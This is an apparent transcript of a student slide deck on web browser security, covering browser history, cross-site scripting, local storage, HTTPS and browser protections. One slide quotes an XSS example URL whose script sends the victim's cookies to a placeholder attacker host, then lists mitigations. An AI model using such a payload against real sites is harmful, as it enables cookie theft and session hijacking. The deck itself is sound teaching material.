Document

Download Report

Transcript Document 

WEB BROWSER SECURITY
By
Robert Sellers
Brian Bauer
INTRODUCTION
Relevance
 Use Internet daily
 Transmit personal information, needs to be secure
Content
1.History
2.Security Issues and Mitigation
3.Protection
HISTORY
• First ever browser – WorldWideWeb
(1990)
o
o
o
o
Created at CERN by Tim Berners-Lee
Used internally, no real security threats
Would only display HTML text
Allowed downloading of other file types
HISTORY
• Mosaic (1993)
o
o
First browser with a GUI
Lead to increase in Internet popularity
• Netscape Navigator (1994)
o
Nearly disappeared by 2000
• Internet Explorer (1995)
o
Held as much as 95% of the market
HISTORY
• Safari (2003)
o
Apple’s browser
• Firefox (2004)
o
Open source
• Chrome (2008)
o
Rapid increase in market share
SECURITY ISSUES
• Increase in security issues
o
o
o
Complexity of web sites and browsers
Size of the Internet
Anyone can access
• Uses of Internet
o
o
o
Online banking
Shopping
More sharing of sensitive data
SECURITY ISSUES
Cross Site Scripting (XSS)
o
o
o
o
Takes advantage of complex, dynamic web pages
Injects client side scripts, HTML
Can lead to cookie theft, browser redirection, untrusted
content
Nearly 80% of vulnerabilities in 2007 (Symantec)
SECURITY ISSUES
Example
http://portal.example/index.php?sessionid=12312312&
username=<script>document.location='http://attackerhost.example/cgi-bin/
cookiesteal.cgi?'+document.cookie</script>
source: http://projects.webappsec.org/w/page/13246920/Cross-Site-Scripting
• XSS Mitigation
 Disable scripting
 Sanitize input, escape HTML/scripts
 No script access to cookies
SECURITY ISSUES
• Local Storage
o
o
Form data
Login credentials
• Encryption - HTTP vs HTTPS
o
Packet sniffing -> session hijacking, password stealing
PROTECTING YOURSELF
ONLINE
• Incognito Mode (Google Chrome)
 Allows user to switch between multiple privacy settings
with the click of a button
 Can be activated in one window/tab but not others
• Browser Guards
o
Modern browsers will prevent users from visiting malicious
sites
Two main methods
 List of reported malicious sites
 Algorithm to detect malicious code on a site
o
This can protect from viruses, phishing, and other threats
o
CONCLUSION
• Browsers can only do so much
• Much security is responsibility of web designers
• Internet users should be aware of issues